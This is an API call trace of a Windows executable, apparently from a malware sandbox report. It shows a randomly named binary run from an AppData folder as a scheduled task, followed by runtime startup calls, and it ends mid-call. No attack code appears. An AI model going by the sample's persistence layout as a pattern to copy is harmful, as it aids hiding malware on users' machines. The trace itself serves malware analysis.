"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 99 os_tid = 0xa18 [0153.471] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x14583160, dwHighDateTime=0x1d69ad5)) [0153.471] GetCurrentProcessId () returned 0x900 [0153.471] GetCurrentThreadId () returned 0xa18 [0153.471] GetTickCount () returned 0x11569db [0153.471] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=27335134070) returned 1 [0153.471] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x409651)) [0153.471] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x280000 [0153.473] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.473] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0153.473] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0153.473] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0153.474] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0153.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.474] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0153.475] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.475] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0153.475] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.475] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0153.475] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.475] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0153.475] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.475] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0153.475] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.475] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0153.476] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.476] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0153.476] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.476] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0153.477] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x214) returned 0x2807d0 [0153.477] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.477] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0153.477] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.477] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0153.477] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0153.477] GetCurrentThreadId () returned 0xa18 [0153.477] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0153.477] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x800) returned 0x2809f0 [0153.478] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0153.478] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0153.478] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0153.478] SetHandleCount (uNumber=0x20) returned 0x20 [0153.478] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --Task" [0153.478] GetEnvironmentStringsW () returned 0xce1da0* [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xaca) returned 0x2811f8 [0153.478] FreeEnvironmentStringsW (penv=0xce1da0) returned 1 [0153.478] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a88b0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\onb5h0yx46mrevq4.exe")) returned 0x65 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xe6) returned 0x281cd0 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x98) returned 0x281dc0 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3e) returned 0x281e60 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x6c) returned 0x281ea8 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x6e) returned 0x281f20 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x78) returned 0x281f98 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x62) returned 0x282018 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2e) returned 0x282088 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x2820c0 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x28) returned 0x282110 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1a) returned 0x282140 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4a) returned 0x282168 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x72) returned 0x2821c0 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x30) returned 0x282240 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2e) returned 0x282278 [0153.478] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1c) returned 0x2822b0 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xd2) returned 0x2822d8 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x7c) returned 0x2823b8 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x36) returned 0x282440 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3a) returned 0x282480 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x90) returned 0x2824c8 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x24) returned 0x282560 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x30) returned 0x282590 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x36) returned 0x2825c8 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x282608 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x52) returned 0x282658 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3c) returned 0x2826b8 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x82) returned 0x282700 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2e) returned 0x282790 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1e) returned 0x2827c8 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2c) returned 0x2827f0 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x54) returned 0x282828 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x52) returned 0x282888 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2a) returned 0x2828e8 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3c) returned 0x282920 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x54) returned 0x282968 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x24) returned 0x2829c8 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x30) returned 0x2829f8 [0153.479] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x8c) returned 0x282a30 [0153.479] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2811f8 | out: hHeap=0x280000) returned 1 [0153.480] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x282ac8 [0153.480] GetLastError () returned 0x0 [0153.480] SetLastError (dwErrCode=0x0) [0153.480] GetLastError () returned 0x0 [0153.481] SetLastError (dwErrCode=0x0) [0153.481] GetLastError () returned 0x0 [0153.481] SetLastError (dwErrCode=0x0) [0153.481] GetACP () returned 0x4e4 [0153.481] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x282b50 [0153.481] GetLastError () returned 0x0 [0153.481] SetLastError (dwErrCode=0x0) [0153.481] IsValidCodePage (CodePage=0x4e4) returned 1 [0153.481] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0153.481] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0153.481] GetLastError () returned 0x0 [0153.481] SetLastError (dwErrCode=0x0) [0153.481] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0153.481] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0153.481] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0153.481] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0153.481] GetLastError () returned 0x0 [0153.481] SetLastError (dwErrCode=0x0) [0153.481] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0153.481] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0153.481] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ릑䢤曳@Ā") returned 256 [0153.482] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ릑䢤曳@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0153.482] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ릑䢤曳@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0153.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿn4ÎI\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0153.482] GetLastError () returned 0x0 [0153.482] SetLastError (dwErrCode=0x0) [0153.482] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0153.482] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ릑䢤曳@Ā") returned 256 [0153.482] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ릑䢤曳@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0153.482] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ릑䢤曳@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0153.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿn4ÎI\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0153.482] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x282ac8) returned 0x80 [0153.483] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4088ff) returned 0x0 [0153.483] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x282ac8) returned 0x80 [0153.484] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x282ac8) returned 0x80 [0153.484] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x282ac8) returned 0x80 [0153.485] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x282ac8) returned 0x80 [0153.485] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x282ac8) returned 0x80 [0153.485] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: 